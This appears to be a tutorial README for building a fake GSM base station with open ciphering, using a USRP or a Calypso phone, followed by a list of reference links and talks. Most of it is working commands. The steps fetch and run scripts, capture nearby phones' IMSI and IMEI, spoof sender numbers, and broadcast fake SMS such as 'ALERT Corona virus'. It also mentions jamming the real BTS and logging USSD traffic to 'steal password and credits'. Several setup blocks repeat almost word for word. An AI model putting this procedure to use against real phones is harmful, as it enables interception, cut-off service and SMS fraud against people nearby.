- Software Defined Radio - An Introduction videos
- Software Defined Radio and rtl-sdr - Harald Welte videos
- 25c3: Running your own GSM network videos
- 27c3: Running your own GSM stack on a phone videos
- Running a basic circuit-switched Osmocom GSM network videos
- Making your own 2G GSM cell network in 2023 videos
- 28c3: Defending mobile phones videos
- [PHDays 2012] Sylvain Munaut: Abusing Calypso phones videos
- DeepSec 2010: Targeted DOS Attack and various fun with GSM Um by Sylvain Munaut videos
- GreedyBTS: Hacking Adventures in GSM - Presented By Hacker Fantastic videos
- 27c3: Wideband GSM Sniffing videos
- OpenBTS workshop at 29c3 videos1 videos2 videos3 videos4 videos5
- OsmoDevCon'12: UmTRX transceiver for OpenBTS videos
- Building and Running Community Cellular Networks with OpenBTS videos
- days Security Conference: Harald Welte - OsmocomBB: GSM protocol level security in GSM networks videos1 videos2
- DeepSec 2010 OsmocomBB A tool for GSM protocol level security analysis of GSM networks videos
- Osmocom - Harald Welte . - ehsm - 2012 videos
- osmocombb calypso-bts demos
- Netdev 1.1 - Running Cellular Network Infrastructure on Linux videos
- OsmoDevCall - GSM-R and how it differs from GSM videos
- Harald Welte: Osmocom - Open Source Mobile Communications vidoes
- Fake base station with open ciphering named A5/0, and the network could be GSM(sms, call), and GPRS, EDGE
- local attack but could be targeting (to find local victim)
- victim couldn't be reached on the real network (indeed call and sms)
- could be detectable with rooted phone and application like imsi-catcher detector, snoopsnitch because of open network
- USRP
- motorola phone (aka calypso phone on google)
- BladeRF
- LimeSDR
- Install DragonOS 29 or 30
- Create fake bts with open ciphering (A5/0)
- Add one users and modify core network for associating it with number 0341220590
- Send message from 0341220590 to 0341220590
- Send broadcast message
- Homework : Change the number 0341220590 as 0341220591
- Solution 1 using USRP (more stable and no need synchronization of existing BTS so if we jam the existing BTS the half mitm still exists)
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts.zip
unzip osmo-nitb-scripts.zip
cd osmo-nitb-scripts
Database is at : /var/lib/osmocom/hlr.sqlite3
Installing all config
bash install_services.sh
For avoiding lock database error
fuser -k /var/lib/osmocom/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
By
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Change spoof script2 modification
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py , please corret the help, change :
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running the transceiver
osmo-trx-uhd -C /etc/osmocom/osmo-trx-uhd.cfg
Running main_uhd_spoof associate with configs/openbsc_spoof.cfg
ctrl+shift+T
cd osmo-nitb-scripts
python3 main_uhd_spoof.py
ctrl+shift+T
cd osmo-nitb-scripts/scripts_spoof1
Tape *#*#4636#*#* and choose GSM only on your Android phone
Search GSM network (on your phone), associate with PLMN MCC 001 && MNC 01
Tape *#001# for finding your phone number (extension with osmo-bts)
bash finding_imsi_extenstion.sh
You could find imsi and extension
let's see for example imsi as 646040222463674 and extension as 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify by if the association is correct let's see for example imsi as 646040222463674 and extension as 0341220590
bash finding_imsi_extenstion.sh
python2 sending_sms_spoof_byextension.py
Sending for all extensions in osmo-bts
python2 sending_sms_broadcast.py
log should be : subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
- Solution 1debug using USRP with manual and debug mode
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts.zip
unzip osmo-nitb-scripts.zip
cd osmo-nitb-scripts
bash install_services.sh
For avoiding lock database error
fuser -k /var/lib/osmocom/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
By
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Change spoof script2 modification
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please corret the help, change :
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running the transceiver
For avoiding lock database error
fuser -k /var/lib/osmocom/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
By
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Change spoof script2 modification
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please corret the help, change :
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
osmo-trx-uhd -C /etc/osmocom/osmo-trx-uhd.cfg
ADDING DEBUG MODE OPTIONS : --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Database at : /var/lib/osmocom/hlr.sqlite3
/usr/local/bin/osmo-nitb --yes-i-really-want-to-run-prehistoric-software -s -C -c /etc/osmocom2/osmo-nitb.cfg -l /var/lib/osmocom/hlr.sqlite3 --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Launching the bts on debug mode ADDING DEBUG MODE OPTIONS : --debug DRSL:DOML:DLAPDM
/usr/local/bin/osmo-bts-trx -s -c /etc/osmocom2/osmo-bts-trx.cfg --debug DRSL:DOML:DLAPDM
Have a look on the terminal at the command : /usr/local/bin/osmo-nitb --yes-i-really-want-to-run-prehistoric-software -s -C -c /etc/osmocom2/osmo-nitb.cfg -l /var/lib/osmocom/hlr.sqlite3 --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Tape *#*#4636#*#* and choose GSM only on your Android phone
Search GSM network (on your phone), associate with PLMN MCC 001 && MNC 01
Have a look on log for capturing IMSI and IMEI
Tape *#001# for finding your phone number (extension with osmo-bts)
Have a look on the log about USSD: Own number requested
Tape USSD *100*123#
Have a look on log of USSB : Unhandled USSD (possible to steal password and credits)
ctrl+shift+T
cd osmo-nitb-scripts/scripts_spoof1
bash finding_imsi_extenstion.sh
You could find imsi and extension
let's see for example imsi as 646040222463674 and extension as 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify by if the association is correct let's see for example imsi as 646040222463674 and extension as 0341220590
bash finding_imsi_extenstion.sh
python2 sending_sms_spoof_byextension.py
Sending for all extensions in osmo-bts
python2 sending_sms_broadcast.py
log should be : subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
- Solution 2 : using one motorola phone
(Not so stable and need synchronization of existing BTS by finding arfcn of synchronization so if we jam the existing BTS the half mitm doesn't exist anymore)
Hardware setup 1 : Need battery and not programmable with arduino
serial_cable smartspate sudonull
Hardware setup 2 : No need battery and programmable with arduino
Command you need :
dmesg | grep ttyUSB*
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts-calypsobts.zip
unzip osmo-nitb-scripts-calypsobts.zip
cd osmo-nitb-scripts-calypsobts
Tape *#*#4636#*#* and choose GSM only on your Android phone
Installing network signal guru on your android phone
And finding the arfcn that this one is connect
Let's name this arfcn as 975
Configure arfcn at services/osmo-trx-lms3.service as 975
gedit services/osmo-trx-lms3.service
Save the configuration
bash install_services.sh
For avoiding lock database error
fuser -k /usr/src/CalypsoBTS/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
By
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Change spoof script2 modification
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please corret the help, change :
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running transceiver
bash trx.sh
Click button power of motorola phone
Tape ctrl+shift+T
cd osmo-nitb-scripts-calypsobts
python3 main_spoof.py
ctrl+shift+T
cd osmo-nitb-scripts-calypsobts/scripts_spoof1
bash finding_imsi_extenstion.sh
You could find imsi and extension
let's see for example imsi as 646040222463674 and extension as 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify by if the association is correct let's see for example imsi as 646040222463674 and extension as 0341220590
bash finding_imsi_extenstion.sh
Tape *#*#4636#*#* and choose GSM only on your Android phone
Search GSM network (on your phone), associate with PLMN MCC 001 && MNC 01
Tape *#001# for finding your phone number (extension with osmo-bts)
python2 sending_sms_spoof_byextension.py
Sending for all extensions in osmo-bts
python2 sending_sms_broadcast.py
log should be : subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
Solution 2debug : using one motorola phone, manual script on debug mode Command you need :
dmesg | grep ttyUSB*
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts-calypsobts.zip
unzip osmo-nitb-scripts-calypsobts.zip
cd osmo-nitb-scripts-calypsobts
Tape *#*#4636#*#* and choose GSM only on your Android phone
Installing network signal guru on your android phone
And finding the arfcn that this one is connect
Let's name this arfcn as 975
Configure arfcn at services/osmo-trx-lms3.service as 975
gedit services/osmo-trx-lms3.service
Save the configuration
bash install_services.sh
For avoiding lock database error
fuser -k /usr/src/CalypsoBTS/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
By
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Change spoof script2 modification
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please corret the help, change :
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running transceiver
bash trx.sh
Click button power of motorola phone
Tape ctrl+shift+T
Launching osmo-nitb with debug mode --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Database at : /usr/src/CalypsoBTS/hlr.sqlite3
osmo-nitb --yes-i-really-want-to-run-prehistoric-software -c /usr/src/CalypsoBTS/openbsc.cfg -l /usr/src/CalypsoBTS/hlr.sqlite3 -P -C --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Launching osmo-bts with debug mode option : --debug DRSL:DOML:DLAPDM
osmo-bts-trx -c /usr/src/CalypsoBTS/osmo-bts-trx-calypso.cfg --debug DRSL:DOML:DLAPDM -r 99
Have a look on the terminal at the command : /usr/local/bin/osmo-nitb --yes-i-really-want-to-run-prehistoric-software -s -C -c /etc/osmocom2/osmo-nitb.cfg -l /var/lib/osmocom/hlr.sqlite3 --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Tape *#*#4636#*#* and choose GSM only on your Android phone
Search GSM network (on your phone), associate with PLMN MCC 001 && MNC 01
Have a look on log for capturing IMSI and IMEI
Tape *#001# for finding your phone number (extension with osmo-bts)
Have a look on the log about USSD: Own number requested
Tape USSD *100*123#
Have a look on log of USSB : Unhandled USSD (possible to steal password and credits)
ctrl+shift+T
cd osmo-nitb-scripts/scripts_spoof1
bash finding_imsi_extenstion.sh
You could find imsi and extension
let's see for example imsi as 646040222463674 and extension as 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify by if the association is correct let's see for example imsi as 646040222463674 and extension as 0341220590
bash finding_imsi_extenstion.sh
python2 sending_sms_spoof_byextension.py
Sending for all extensions in osmo-bts
python2 sending_sms_broadcast.py
log should be : subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
- Remark : Don't use this delete_all.sh script after running BTS, the best is before running a bts
bash delete_all.sh
The extension 0341220590 should exist as a mobile phone on the GSM network
Using rpizero with automatedscript demos MS-14 cable
- https://osmocom.org/projects/baseband/wiki/CalypsoBTS
- https://github.com/spm81/CalypsoBTS
- https://www.smartspate.com/how-to-create-2g-network-at-your-own-home/
- https://cyberloginit.com/2018/04/27/build-a-gsm-network-with-openbsc-osmobts-osmotrx-and-usrp-b210-on-a-single-pc.html
- https://osmocom.org/issues/4030
- https://www.phdays.com/en/press/news/the-mitm-mobile-contest-gsm-network-down-at-phdays-v/
- https://osmocom.org/projects/baseband/wiki/Phones